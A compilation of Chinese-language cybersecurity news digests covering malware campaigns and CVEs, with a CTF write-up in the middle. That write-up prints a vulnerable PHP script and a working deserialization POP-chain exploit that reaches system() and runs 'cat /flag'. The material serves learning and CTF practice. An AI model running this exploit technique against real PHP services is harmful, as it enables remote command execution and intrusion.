1、 新型.NET后门CAPI攻击俄汽车与电商业 https://www.seqrite.com/blog/seqrite-capi-backdoor-dotnet-stealer-russian-auto-commerce-oct-2025/ Seqrite Labs披露一项针对俄罗斯汽车与电商领域的网络钓鱼行动，攻击者通过含ZIP压缩包的邮件投递名为“CAPI Backdoor”的新型.NET恶意软件。压缩包内含伪装为税收法规通知的俄文诱饵文档及同名LNK快捷方式，后者利用系统合法程序rundll32.exe加载后门DLL“adobe.dll”，实现“借壳执行”。该后门具备检测管理员权限、识别防病毒软件、窃取浏览器数据、截图、收集系统信 2、131款Chrome扩展劫持WhatsApp进行大规模垃圾信息活动 https://socket.dev/blog/131-spamware-extensions-targeting-whatsapp-flood-chrome-web-store 安全公司Socket揭露，一场针对巴西用户的协调性滥用活动利用了131个伪装为WhatsApp Web自动化工具的Chrome扩展，用于大规模垃圾信息发送。这些扩展共享相同代码与基础设施，合计拥有约2万活跃用户，由“WL Extensão”及其变体账户发布，源自巴西公司DBX Tecnologia的白标授权计划。攻击者通过这些扩展在WhatsApp Web中直接注入代码，自动批量发送信息、绕过反垃圾机制，并以“CR 3、TikTok视频蔓延ClickFix窃密攻击 https://www.bleepingcomputer.com/news/security/tiktok-videos-continue-to-push-infostealers-in-clickfix-attacks/ 安全研究者发现，犯罪分子在TikTok上发布伪装为“免费激活”指南的视频，利用ClickFix社工手法诱导用户在PowerShell中运行一行命令以下载并执行恶意脚本，从而感染信息窃取器（如Aura Stealer）并窃取浏览器凭证、钱包及其它敏感数据。ISC与BleepingComputer的分析指出，攻击链会从远程站点（例如 slmgr[.]win）检索脚本并进一步从 4、微软警告十月更新导致智能卡认证故障 https://learn.microsoft.com/en-us/windows/release-health/status-windows-11-25h2#3697msgdesc 微软发布通告称，2025年10月的Windows安全更新引发了智能卡认证与证书相关问题，影响范围涵盖所有版本的Windows 10、Windows 11及Windows Server。该问题源于微软为增强加密安全性而默认启用的一项更改，将RSA智能卡证书从CSP迁移至KSP机制，以防止CVE-2024-30098漏洞利用。然而，该调整导致部分系统出现无法识别智能卡、签名失败及“invalid provider 5、CISA 警告称苹果、Kentico、微软多个漏洞已被利用 https://www.securityweek.com/cisa-warns-of-exploited-apple-kentico-microsoft-vulnerabilities/ 美国网络安全机构 CISA 于周一警告称，最近公开的 Windows SMB 客户端和 Kentico Xperience CMS 漏洞已在野外被利用。CVE-2022-48503（CVSS 评分为 8.8），一个在苹果产品中的任意代码执行问题，已经在野外被滥用。 6、无印良品因物流合作伙伴遭勒索攻击暂停线上销售 https://www.freebuf.com/articles/es/453589.html 日本零售巨头无印良品（Muji）在其物流合作伙伴Askul遭受勒索软件攻击后，暂停了线上销售业务。此次网络事件导致配送服务和线上商店功能中断，包括订单处理和应用服务。 7、TP-Link Omada网关曝高危漏洞，可未授权远程执行命令 https://www.freebuf.com/articles/es/453472.html TP-Link Systems 已发布新版固件，修复其广受欢迎的 Omada 网关系列产品中四个高危漏洞，这些产品包括 ER605、ER7206、ER8411 等在企业和小型商业网络中广泛部署的型号。编号为 CVE-2025-6541、CVE-2025-6542、CVE-2025-7850 和 CVE-2025-7851 的漏洞可使攻击者在受影响设备上执行任意操作系统命令，某些情况下甚至无需认证。 8、杜比解码器零点击漏洞曝光，安卓用户可能遭RCE https://www.freebuf.com/articles/system/453416.html 杜比DDPlus解码器中被披露存在一处关键零点击漏洞，攻击者可通过看似无害的音频消息远程执行恶意代码。谷歌Project Zero团队的Ivan Fratric与Natalie Silvanovich发现，DDPlus解码器在处理音频文件演进数据时存在越界写入缺陷。 9、GlassWorm蠕虫利用隐形Unicode与区块链实现隐蔽C2通信 https://securityonline.info/glassworm-supply-chain-worm-uses-invisible-unicode-and-solana-blockchain-for-stealth-c2/ 全球首个VS Code扩展恶意软件GlassWorm被发现，结合隐形Unicode注入、区块链C2和RAT功能，已感染3.58万次安装。它能自主传播、窃取凭证并控制设备，代表供应链攻击新高度，目前仍在活跃扩散。 10、微软WSUS曝高危漏洞PoC 利用代码已公开 https://cybersecuritynews.com/poc-wsus-rce-vulnerability/ 微软WSUS(Windows Server Update Services )曝高危漏洞CVE-2025-59287（CVSS 9.8），允许未授权攻击者以SYSTEM权限远程执行代码，影响2012-2025所有版本。PoC已公开，建议立即应用10月补丁并隔离WSUS服务器，防范供应链攻击风险。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

0.前言 好久没打CTF了，打个羊城杯回顾一下，记录一下做题过程。 1.web1 给了份php代码 <?php error_reporting(0); highlight_file(__FILE__); class A {    public $first;    public $step;    public $next;    public function __construct() {        $this->first = "继续加油！";   }    public function start() {        echo $this->next;   } } class E {    private $you;    public $found;    private $secret = "admin123";    public function __get($name){        if($name === "secret") {            echo "<br>".$name." maybe is here!</br>";            $this->found->check();       }   } } class F {    public $fifth;    public $step;    public $finalstep;    public function check() {        if(preg_match("/U/",$this->finalstep)) {            echo "仔细想想！";       }        else {            $this->step = new $this->finalstep();           ($this->step)();       }   } } class H {    public $who;    public $are;    public $you;    public function __construct() {        $this->you = "nobody";   }    public function __destruct() {        $this->who->start();   } } class N {    public $congratulation;    public $yougotit;    public function __call(string $func_name, array $args) {        return call_user_func($func_name,$args[0]);   } } class U {    public $almost;    public $there;    public $cmd;    public function __construct() {        $this->there = new N();        $this->cmd = $_POST['cmd'];   }    public function __invoke() {        return $this->there->system($this->cmd);   } } class V {    public $good;    public $keep;    public $dowhat;    public $go;    public function __toString() {        $abc = $this->dowhat;        $this->go->$abc;        return "<br>Win!!!</br>";   } } unserialize($_POST['payload']); ?> 代码审计后一看就能看到unserialize这个危险函数 unserialize() 函数用于将通过serialize()函数序列化后的对象或数组进行反序列化，并返回原始的对象结构 并且代码里面没有进行任何的过滤和检验，那么如果类中定义了像： __destruct()，__toString()，__wakeup() __call()、__get()、__invoke() 等这样的魔术方法，攻击者就可以通过构造精心的序列化对象，就可以让 PHP 自动执行任意代码路径 而这份代码里刚好有一整套可链式调用的危险类 首先是class A public function start() {        echo $this->next;   } 当 echo $this->next 时，若 $this->next 是个对象且定义了 __toString()，则会触发它 接着是 class E public function __get($name){    if($name === "secret") {        echo "<br>".$name." maybe is here!</br>";        $this->found->check();   } } 这会触发 $this->found->check() 还有class H public function __destruct() {        $this->who->start();   } 在销毁时自动调用 $this->who->start() class U直接进行任意命令执行 public function __invoke() {    return $this->there->system($this->cmd); } 还有class F class V 也有类似的魔术方法，所以我们可以构造一串序列化对象，让程序在 unserialize() 时自动触发这一系列魔术方法，最终执行系统命令， 拿到flag，这就是脚本的思路 import requests import urllib.parse url = ""  #web1给的目标url payload_str = 'O:1:"H":3:{s:3:"who";O:1:"A":3:{s:5:"first";N;s:4:"step";N;s:4:"next";O:1:"V":4:{s:4:"good";N;s:4:"keep";N;s:6:"dowhat";s:6:"secret";s:2:"go";O:1:"E":3:{s:6:"\00E\00you";N;s:9:"\00E\00secret";s:8:"admin123";s:5:"found";O:1:"F":3:{s:5:"fifth";N;s:4:"step";N;s:9:"finalstep";s:1:"u";}}}} data = {    "payload": payload_str,    "cmd": "cat /flag" } try:    response = requests.post(url, data=data, timeout=10)    print("响应状态码:", response.status_code)    print("响应内容:\n", response.text) except Exception as e:    print("请求错误:", e) 用 requests.post 向目标 URL 发起一个表单 POST，请求体包含两个字段： payload：一个 PHP serialize() 格式的字符串（会被服务端 unserialize()）。 cmd：要传给后续链路执行/使用的命令（在原始易受攻击代码中会被 U 类读取并最终交给 system()） 然后来依次解释payload_str 最外层：O:1:"H":3:{ ... } —— 一个 H 实例，3 个属性：who, are, you who → 是一个 A 对象：O:1:"A":3:{ ... } A 的 next 字段被设置成一个 V 对象：O:1:"V":4:{ ... } V->dowhat = "secret"（注意是字符串 "secret"） V->go → 是一个 E 对象：O:1:"E":3:{ ... } 在 E 对象内，你看到 \00E\00secret 被赋值为 "admin123" E->found → 是一个 F 对象：O:1:"F":3:{ ... } F->finalstep 被设置为 s:1:"u" H 的其它属性 are、you 在 payload 里是 N。 简单点来说，就是payload 手工把 H → A → V → E → F 这样的对象关系构造出来，并把 F->finalstep 置为 'u'，把 V->dowhat 置为 'secret'，并把 E 的私有 secret 属性显式写成 "admin123" 那是如何触发ROP链的呢？ 首先，服务端会执行 unserialize($_POST['payload'])，然后在脚本结束或对象被回收时，H::__destruct() 会自动运行，其中有 $this->who- >start();，即会调用 A->start()去执行 echo $this->next; 由于 A->next 被设为一个对象 V，echo 会触发 V::__toString()，而V::__toString() 的操作是内部读取 $this->dowhat（"secret"），然后执行 $this->go->$abc，即 E->secret，访问该属性会触发 E::__get('secret')，E::__get() 在检测到 $name === "secret" 时会执行 $this->found->check() —— 也就是调用 F::check() F::check() 会去检查 preg_match("/U/", $this->finalstep); 如果 finalstep 包含大写 U，则会不予继续执行 但这里 payload 把 finalstep 设为小写 'u'（s:1:"u"），preg_match("/U/","u") 不匹配，因此绕过了 所以因此 F::check() 会执行： $this->step = new $this->finalstep(); ($this->step)(); 这会 new 一个名为 'u' 的类，在 PHP 中类名不区分大小写，因此 'u' 会解析为 U 类，并随后把该实例当函数调用，触发 U::__invoke() 而U::__invoke() 会调用 $this->there->system($this->cmd) 而且，there 被构造为 N，而 N::__call() 会把方法名当作函数名执行（call_user_func($func_name,$args[0])），从而把 system($cmd) 真正执行出来 最后U::__construct() 在构造时会读取 $_POST['cmd']，即脚本里传的 "cat /flag"，所以最终会对传入的 cmd 执行 所以成功拿到flag 2.misc-成功男人背后的女人 层层解包之后，发现是一张图片 这种一般都是图片里面隐藏有什么东西，用010打开看看 发现是mkbt，应该是那种自定义的模块，上网找找资料 发现是adobe fireworks 的专有格式，需要使用fireworks才能看到完整信息 https://zhuanlan.zhihu.com/p/32247127059打开之后发现一张隐藏图片 打开看看，发现是带有一些符号的图片 一开始还没有想明白这是什么东西，直到有师傅提醒说这是二进制，男是1，女是0，就可以转换为flag了..... 3.re1 拿到题目是个exe文件，先点开看看能不能运行，一运行就看到熟悉的界面，这个界面和图标太熟悉了！(别问我为什么会熟悉！) 这是Godot引擎写的游戏，所以得去找对应的逆向工具 https://github.com/GDRETools/gdsdecomp拿工具提取之后，就能发现所有文件的代码都能看到(这比C逆向好看多了) 在main.gdc文件中发现了一个类似输出结果分数的函数，怀疑这里就是flag输出的地方 当分数达到特定值 7906 时，把字符串 a 按自定义编码解码成文本 var bin_chunk = a.substr(i, 12)：取出当前的 12 位子串 将这 12 位再分为 三个 4 位子串： hundreds = bin_chunk.substr(0, 4).bin_to_int()：把前 4 位当作二进制数（0~15），转成整数，作百位数字 tens = bin_chunk.substr(4, 4).bin_to_int()：中间 4 位，当作十位（0~15） units = bin_chunk.substr(8, 4).bin_to_int()：最后 4 位，当作个位（0~15） var ascii_value = hundreds * 100 + tens * 10 + units：把三个小数位组组合成一个十进制数，计算方法是 hundreds*100 + tens*10 + units —— 也就是说每 4 位不是直接表示一个十进制数，而是分别代表 ASCII 值的百位、十位、个位 如果三个 4 位分别是 0000, 0001, 0010，那就是 0*100 + 1*10 + 2 = 12 → ASCII 码 12 result += String.chr(ascii_value)：把计算出的十进制作为 ASCII 码，用 String.chr 转成字符并追加到 result 循环结束后，$HUD.show_message(result) 在 HUD 上显示解码后的整段文本 那脚本编写就很容易了，因为我们没时间在游戏中拿到7906分，所以可以直接把代码中字符串a的数值拷贝下来，然后再把上述代码张贴上去，让它跑字符串a的 数值就可以了，就这么简单 a = "0000011010000000011001010000100000110000011001110000100001000000011100000001001000110001001000000000011001110001000101110000011001100001000001010000011100000000100010010001000101000000010001010001000101110000010100110000100101110000100000000000010100000000010001010000100000010001000001100001000 flag = "" for i in range(0, len(a), 12):    bin_chunk = a[i:i+12]    hundreds = int(bin_chunk[0:4], 2)    tens = int(bin_chunk[4:8], 2)    units = int(bin_chunk[8:12], 2)    ascii_value = hundreds * 100 + tens * 10 + units    flag += chr(ascii_value) print(flag)

1、 虚假Homebrew恶意软件借谷歌广告推广诱导macOS用户感染 https://hunt.io/blog/macos-odyssey-amos-malware-campaign 研究人员称，一起针对macOS开发者的恶意活动通过伪造Homebrew、LogMeIn与TradingView网站并借助Google Ads推广，诱导用户复制粘贴终端命令（“ClickFix”手法）来安装恶意软件。伪站点提供看似正常的下载入口，但复制按钮实际将base64编码的安装命令写入剪贴板，运行后会下载并执行install.sh，绕过Gatekeeper、移除隔离标记并以sudo提权。载荷为AMOS（已商业化的MaaS）或Odyssey Stealer，先检测虚拟机/分析环 2、欧盟破获跨国SIM卡犯罪网络 https://www.europol.europa.eu/media-press/newsroom/news/cybercrime-service-takedown-7-arrested 在代号为“SIMCARTEL”的行动中，欧洲刑警组织（Europol）联合多国警方摧毁了一个非法SIM盒服务网络，该网络租售虚假电话号码供网络犯罪使用，涉及3200多起诈骗案，造成损失超450万欧元。该服务通过网站gogetsms.com与apisim.com运营，拥有约1200台SIM盒设备和4万张SIM卡，为用户提供全球80多个国家注册的电话号码，用于开设和验证虚假账户，从而隐藏真实身份。警方指出，该 3、微软修复史上最严重ASP.NET漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-fixes-highest-severity-aspnet-core-flaw-ever/ 微软近日修复了一个被评为“ASP.NET Core史上最高严重等级”的漏洞（CVE-2025-55315），该漏洞存在于Kestrel Web服务器中，可被认证攻击者利用实施HTTP请求走私，从而劫持其他用户凭证或绕过前端安全控制。成功利用后，攻击者可访问敏感信息、篡改文件内容或导致服务器崩溃。微软已为Visual Studio 2022、ASP.NET Core 2.3、8.0与9.0 4、ConnectWise修复可被利用的Automate漏洞 https://www.connectwise.com/company/trust/security-bulletins/connectwise-automate-2025.9-security-fix ConnectWise发布安全更新，修复其远程监控与管理平台Automate中的两项严重漏洞，其中编号为CVE-2025-11492的漏洞严重度高达9.6，因代理可通过未加密的HTTP通信，可能被攻击者实施“中间人攻击”（AiTM），拦截或篡改指令、凭证及更新数据。另一漏洞CVE-2025-11493缺乏更新包完整性验证，攻击者可借此伪造合法服务器推送恶意更新。两者结合可使攻击者在高权限环境 5、美航子公司Envoy遭Clop窃取Oracle数据 https://www.bleepingcomputer.com/news/security/american-airlines-subsidiary-envoy-confirms-oracle-data-theft-attack/ 美国航空旗下地区航空公司Envoy Air证实，其Oracle E-Business Suite系统遭到数据窃取，此前Clop勒索团伙在其泄露网站上公布了所谓被盗数据。Envoy表示事件发生后立即展开调查并报警，经审查确认未涉及客户或敏感信息，仅部分业务资料与商业联系方式受影响。该事件与Clop于今年8月发起的Oracle数据盗取行动有关，攻击者利用零日漏洞CV 6、银狐组织攻击范围扩展至日本和马来西亚 https://www.freebuf.com/articles/453198.html 网络安全研究人员发现，被称为Winos 4.0（又名ValleyRAT）的恶意软件家族背后的威胁行为者已将其攻击范围从中国大陆和台湾地区扩展到日本和马来西亚，此次攻击使用了另一个远程访问木马（RAT）——HoldingHands RAT（又名Gh0stBins）。 7、Spring两大漏洞可导致泄露敏感信息及安全防护绕过 https://securityonline.info/spring-patches-two-flaws-spel-injection-cve-2025-41253-leaks-secrets-stomp-csrf-bypasses-websocket-security/ Spring发布两项高危漏洞修复：CVE-2025-41253影响Spring Cloud Gateway，可能导致SpEL注入泄露敏感数据；CVE-2025-41254影响Spring Framework，允许WebSocket CSRF绕过发送未授权消息。建议用户立即升级或采取临时防护措施。 8、思科修复桌面及IP电话高危DoS漏洞 https://securityonline.info/cisco-patches-high-severity-cve-2025-20350-dos-flaw-in-desk-and-ip-phones/ 思科修复两款高危漏洞（CVE-2025-20350和CVE-2025-20351），影响9800、7800、8800和8875系列电话，可能导致DoS或XSS攻击。漏洞利用需启用Web访问（默认禁用）。思科已发布固件更新，建议用户尽快升级。 9、CISA警告Windows访问控制漏洞正遭攻击者利用 https://cybersecuritynews.com/windows-improper-access-control-vulnerability/ CISA警告Windows高危漏洞CVE-2025-59230正被利用，该漏洞允许本地提权控制整个网络，影响Win10/11及Server版本。微软已发布补丁，联邦机构须在11月5日前修复，否则面临数据泄露风险。建议立即更新并限制远程访问。 10、神秘象APT组织渗透亚太政府机构窃取敏感信息 https://cybersecuritynews.com/mysterious-elephant-apt-hackers-infiltrate-organization/ 神秘象APT组织针对亚太政府机构，利用钓鱼邮件触发Office漏洞（CVE-2017-11882），部署BabShell和MemLoader HidenDesk加载器窃取WhatsApp数据，采用XOR加密外传，技术成熟且隐蔽性强。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、SAP NetWeaver漏洞可使攻击者无需登录即可接管服务器 https://onapsis.com/blog/sap-security-patch-day-october-2025/ SAP发布10月安全更新，修复13项漏洞，其中最严重的CVE-2025-42944（CVSS 10.0）存在于NetWeaver AS Java中，源于RMI-P4模块的不安全反序列化，攻击者可在无需登录的情况下通过开放端口提交恶意载荷，实现任意系统命令执行，完全控制服务器。此次更新在原有修复基础上新增JVM级过滤机制（jdk.serialFilter），防止敏感类被反序列化。此外，SAP还修复了打印服务目录遍历漏洞（CVE-2025-42937，CVSS 9.8）与供 2、Red Lion RTU中的两个漏洞可能使黑客获得完全工业控制权 https://claroty.com/team82/research/roaring-access-exploiting-a-pre-auth-root-rce-on-sixnet-rtus 研究人员披露，Red Lion SixTRAK与VersaTRAK系列RTU存在两处最高评分漏洞（CVE-2023-42770、CVE-2023-40151），可被未认证攻击者绕过验证并以根权限执行任意命令，影响能源、水务、交通等工业控制场景。厂商与CISA已发布通告并提供修补建议；建议用户尽快打补丁、启用设备用户认证并阻断对受影响设备的TCP访问以降低被链式利用的风险。 3、黑客利用思科SNMP漏洞在“Zero Disco”攻击中部署恶意软件 https://www.trendmicro.com/en_us/research/25/j/operation-zero-disco-cisco-snmp-vulnerability-exploit.html 研究人员披露，代号“Zero Disco”的攻击利用Cisco IOS/IOS XE中的SNMP栈溢出漏洞CVE-2025-20352（CVSS 7.7）在未打补丁的旧设备（9400、9300、3750G 等）上部署Linux根套件。入侵者通过构造的SNMP包触发代码执行，随后在IOSd内存植入钩子、设置包含“disco”字样的通用密码、并通过UDP控制器开启后门、禁用日志与篡改配置 4、朝鲜黑客利用区块链“EtherHiding”技术投递恶意软件 https://cloud.google.com/blog/topics/threat-intelligence/dprk-adopts-etherhiding Google威胁情报组（GTIG）发现，朝鲜国家级黑客组织UNC5342自2025年2月起在“Contagious Interview”行动中采用“EtherHiding”技术，通过智能合约在以太坊和币安智能链上隐藏并投递恶意代码。这是首次发现国家级攻击者使用该方法。该技术可将载荷嵌入区块链智能合约中，凭借匿名性和抗下架性实现隐蔽传播。攻击者伪装成招聘人员，诱骗开发者在“面试考核”中运行JavaScript下载器，加载名为“JADE 5、微软阻断针对Teams用户的勒索攻击 https://www.bleepingcomputer.com/news/microsoft/microsoft-disrupts-ransomware-attacks-targeting-teams-users/ 微软近日成功阻止一系列由威胁组织“Vanilla Tempest”（又称 Vice Society、VICE SPIDER）发起的Rhysida勒索软件攻击。该组织通过伪造的Teams安装网站（如teams-install[.]top等）和恶意广告投放传播伪造的“MSTeamsSetup.exe”文件，利用签名恶意证书分发Oyster后门（又名Broomstick或CleanU 6、CISA警告Adobe严重漏洞已被攻击者利用 https://www.cisa.gov/news-events/alerts/2025/10/15/cisa-adds-one-known-exploited-vulnerability-catalog CISA近日警告称，攻击者正积极利用Adobe Experience Manager（AEM）中的严重漏洞（CVE-2025-54253）发起攻击。该漏洞源自AEM Forms在JEE 6.5.23及更早版本中的配置缺陷，允许未认证的攻击者绕过安全机制并执行远程代码。成功利用该漏洞无需用户交互，攻击复杂度低。该漏洞于2025年4月由Searchlight Cyber的研究员发现，并报告给A 7、超过26.6万F5 BIG-IP实例暴露于远程攻击风险中 https://www.bleepingcomputer.com/news/security/over-266-000-f5-big-ip-instances-exposed-to-remote-attacks/ 2025年10月16日，BleepingComputer报道指出，超过26.6万台F5 BIG-IP设备暴露于远程攻击风险，可能遭遇严重的网络攻击。这些设备广泛应用于企业数据中心中，负责管理应用程序流量和负载均衡。然而，多个F5 BIG-IP版本中存在未修复的高危漏洞，黑客可以通过这些漏洞远程执行恶意命令，危及企业的网络安全。该问题源自F5 BIG-IP系统中的多个漏洞，其中最严重 8、WatchGuard VPN漏洞可导致攻击者远程接管设备 https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015 2025年10月17日，网络安全研究人员披露了一项已修复的WatchGuard Fireware漏洞（CVE-2025-9242），该漏洞可能允许未经身份验证的远程攻击者执行任意代码，严重威胁VPN服务的安全。该漏洞影响了多个版本的Fireware OS，包括11.10.2至12.11.3和2025.1，CVSS评分高达9.3。攻击者可以通过利用该漏洞，在VPN隧道建立过程中的IKE_SA_AUTH阶段触发缓冲区溢出，从而实现远程代码执行。漏洞的根源在于“ike2_P 9、丝绸诱饵行动：中国金融科技企业遭恶意简历LNK文件攻击 https://securityonline.info/operation-silk-lure-chinese-espionage-targets-fintech-with-malicious-resume-lnk-to-implant-valleyrat/ Seqrite实验室发现"丝绸诱饵行动"网络活动，攻击者伪装求职者发送恶意简历.LNK文件，针对中国金融科技企业。攻击链包含多阶段载荷、计划任务持久化和ValleyRAT木马，具备数据窃取和反检测能力，C2服务器位于美国。 10、国安破获美国NSA入侵中国国家授时中心案 https://www.ithome.com/0/890/556.htm 2022 年 3 月 25 日起，美国安局利用某境外品牌手机短信服务漏洞，秘密网攻控制国家授时中心多名工作人员的手机终端，窃取手机内存储的敏感资料。2023 年 4 月 18 日起，美国安局多次利用窃取的登录凭证，入侵国家授时中心计算机，刺探该中心网络系统建设情况。2023 年 8 月至 2024 年 6 月，美国安局专门部署新型网络作战平台，启用 42 款特种网攻武器，对国家授时中心多个内部网络系统实施高烈度网攻，并企图横向渗透至高精度地基授时系统，预置瘫痪破坏能力。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、威胁行为者通过OpenVSX平台投放恶意VSCode扩展 https://www.koi.ai/blog/tiger-jack-malicious-vscode-extensions-stealing-code 安全研究机构Koi Security发现，名为TigerJack的威胁行为者再次通过OpenVSX平台投放恶意VSCode扩展，针对开发者窃取加密货币并植入后门。此前已在微软VSCode市场下架的扩展 “C++ Playground” 和 “HTTP Format” 仍在OpenVSX上可下载。前者通过监听编辑事件实时外传源代码，后者则在后台运行CoinIMP挖矿程序，占用全部主机算力。此外，部分扩展还能从远程服务器周期性加载并执行Java 2、近20万台Framework笔记本曝Secure Boot绕过风险 https://eclypsium.com/blog/bombshell-the-signed-backdoor-hiding-in-plain-sight-on-framework-devices/ 固件安全公司Eclypsium报告称，美国电脑厂商Framework约20万台运行Linux的笔记本和桌面系统存在Secure Boot绕过风险。问题源于其出厂固件中包含签名的UEFI Shell组件，其中的 “mm” 命令 可直接读写系统内存。攻击者可利用该命令篡改关键变量gSecurity2，将其置空以禁用签名验证，从而加载恶意bootkit（如 BlackLotus、HybridPety 3、美司法部查获150亿美元“杀猪盘”加密资产 https://www.justice.gov/usao-edny/pr/chairman-prince-group-indicted-operating-cambodian-forced-labor-scam-compounds-engaged 美国司法部宣布，从柬埔寨犯罪组织 “Prince Group” 首领陈志（又名Vincent）处查获约150亿美元比特币。该集团自2015年起在全球三十余国设立百余家空壳公司，通过社交媒体与交友平台实施“杀猪盘”式加密投资诈骗，诱骗受害者投入虚假项目后转移资金。调查显示，组织在柬埔寨设有封闭园区，强迫数千人从事诈骗并以暴力威胁控制。陈志涉嫌贿赂官员 4、F5遭国家级黑客入侵泄露BIG-IP源代码与漏洞信息 https://my.f5.com/manage/s/article/K000154696 美国网络安全公司F5披露，其系统遭国家级黑客入侵，导致BIG-IP产品源代码及未公开漏洞信息被窃取。事件最早于2025年8月9日被发现，调查显示攻击者长期潜伏于F5的产品开发与工程知识平台中，外泄部分客户配置与实现细节。尽管尚无证据表明被盗漏洞被利用或源代码遭篡改，F5强调软件供应链安全未受影响。公司已重置凭据、强化访问控制，并委托NCC Group、IOActive、CrowdStrike与Mandiant独立审查。为防范潜在风险，F5发布多项安全更新及威胁狩猎指南，建议用户及时升级BIG-IP、F 5、黑客假冒LastPass与Bitwarden邮件诱导用户下载远控木马 https://blog.lastpass.com/posts/october-13-2025-phishing-campaign 安全通报指出，一波冒充LastPass与Bitwarden的钓鱼邮件谎称发生泄露，诱导用户下载“更安全”的桌面客户端。实际上，所下载二进制会安装Syncro MSP代理并进一步部署ScreenConnect远程访问工具——隐藏托盘、定期回连、并尝试禁用安全软件。攻击者可借此远程控制受害主机、部署恶意载荷并窃取密码管理器凭证。LastPass已声明未遭入侵，Cloudflare已屏蔽相关落地页；安全研究建议用户仅通过官方网站获取更新，切勿运行来路不明的安装包。 6、Rockwell RAT路由器存在严重漏洞可完全接管 https://www.anquanke.com/post/id/312605 罗克韦尔自动化（Rockwell Automation）发布新安全公告，警告客户其1783-NATR网络地址转换（NAT）路由器存在三个漏洞，其中包括一个严重的认证绕过缺陷，可能导致受影响设备被完全接管管理员权限。 7、Chrome修复安全浏览组件中的高危UAF漏洞 https://www.anquanke.com/post/id/312611 谷歌已发布面向桌面端的新稳定版更新，将在未来几天至几周内逐步推送至Windows、macOS和Linux系统。此次更新将Windows和Mac版Chrome升级至141.0.7390.107/.108，Linux版升级至141.0.7390.107，修复了一个高严重性安全漏洞，该漏洞可能允许攻击者利用Chrome的安全浏览（Safe Browsing）组件发起攻击。 8、Veeam Backup 中被发现存在严重RCE漏洞 https://www.anquanke.com/post/id/312608 Veeam Software已发布补丁，修复三个新披露的漏洞，其中包括Veeam Backup & Replication中的两个严重远程代码执行（RCE）漏洞，以及Veeam Agent for Microsoft Windows中的一个权限提升漏洞。 9、Microsoft IIS 漏洞允许未授权攻击者执行恶意代码 https://www.freebuf.com/articles/web/452780.html 微软近日披露其互联网信息服务（IIS）平台存在一个关键的远程代码执行漏洞，该漏洞对依赖Windows服务器进行网络托管的企业构成安全风险。该漏洞编号为CVE-2025-59282，影响处理全局内存的Inbox COM Objects组件，源于竞态条件（race condition）和释放后使用（use-after-free）错误。微软于2025年10月14日发布公告，将其CVSS 3.1基础评分定为7.0，评级为"重要"。 10、Altamides监控平台曝光：全球上万位政要、记者与高管遭秘密追踪 https://www.secrss.com/articles/84023 最近，一项国际调查揭露了一个名为Altamides的电话跟踪平台，这个平台已秘密运作20年，利用电信协议漏洞，仅凭一个电话号码就能实时定位全球任何人的位置。根据泄露的记录，这个平台被用于监视超过14,000个电话号码，目标包括政治人物、知名高管、记者和活动人士。这不仅仅是技术漏洞的滥用，更是全球监视产业的黑暗一角。 声明 以上内容原文自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Astaroth银行木马利用GitHub发起攻击 https://www.mcafee.com/blogs/other-blogs/mcafee-labs/astaroth-banking-trojan-abusing-github-for-resilience/ 网络安全研究人员报告称，Astaroth银行木马在新一轮活动中利用GitHub作为配置后备，通过托管隐写图片来更新配置，使得在传统C2被查封后仍能继续运行。攻击链始于仿DocuSign的钓鱼邮件，受害者下载并打开被压缩的.lnk快捷方式，内含混淆JavaScript以拉取额外代码并下载AutoIt脚本，随后执行shellcode、加载Delphi DLL并注入RegSvc.exe 2、研究人员揭露TA585的MonsterV2恶意软件功能和攻击链 https://www.proofpoint.com/us/blog/threat-insight/when-monster-bytes-tracking-ta585-and-its-arsenal 研究人员披露，名为TA585的威胁组织通过钓鱼、网页注入与伪造GitHub告警等多种自持交付手段，独立掌控完整攻击链以传播MonsterV2木马。MonsterV2为即付即用的远控/信息窃取/加载器，支持HVNC、剪贴板替换、按键记录、屏幕截取与远程命令执行，常用PowerShell或ClickFix社会工程触发，通常由SonicCrypt加壳并带有反调试、反沙箱与持久化功能；其控制端按地理位置 3、开发者包被滥用向Discord泄密 https://socket.dev/blog/weaponizing-discord-for-command-and-control 研究人员发现，多款npm、PyPI和RubyGems恶意软件包利用Discord webhook作为C2渠道，将开发者敏感数据发送至攻击者控制的频道。例如，mysql-dumpdiscord窃取配置文件，sqlcommenter_rails收集系统信息发送至固定webhook。此类攻击可在安装或构建阶段悄然获取.env、API密钥及主机信息，绕过运行时监控。同时，北朝鲜相关组织通过“Contagious Interview”运动上传数百个恶意或拼写相似包，目 4、Android系统存在Pixnapping漏洞可窃取2FA代码 https://www.pixnapping.com/ 研究人员披露名为Pixnapping的新型像素侧信道攻击，能在Android（在测验的Google/Samsung设备上为Android 13–16）上在不需特殊权限的情况下，利用意图与半透明Activity叠加将目标像素送入渲染流水线，并通过GPU压缩侧效应逐像素窃取2FA验证码、Google Maps时间线等敏感信息。攻击依赖先前的GPU.zip技术并可在30秒内提取验证码；需诱导用户安装并运行恶意应用。谷歌以CVE‑2025‑48561在2025年9月发布部分修补，并计划在12月推更全面补丁；研究者亦指出存在通过调整时序绕过缓解措 5、AMD CPU漏洞可导致机密虚拟机被绕过与窃取 https://rmpocalypse.github.io/#abstract ETH Zürich研究人员披露名为“RMPocalypse”的缺陷，攻击者仅需在逆向映射表（RMP）中写入8字节即可破坏AMD SEV‑SNP的机密计算保障，导致机密虚拟机（CVM）完整性与机密性被完全绕过与窃取。AMD已将该问题标为CVE‑2025‑0033（CVSS 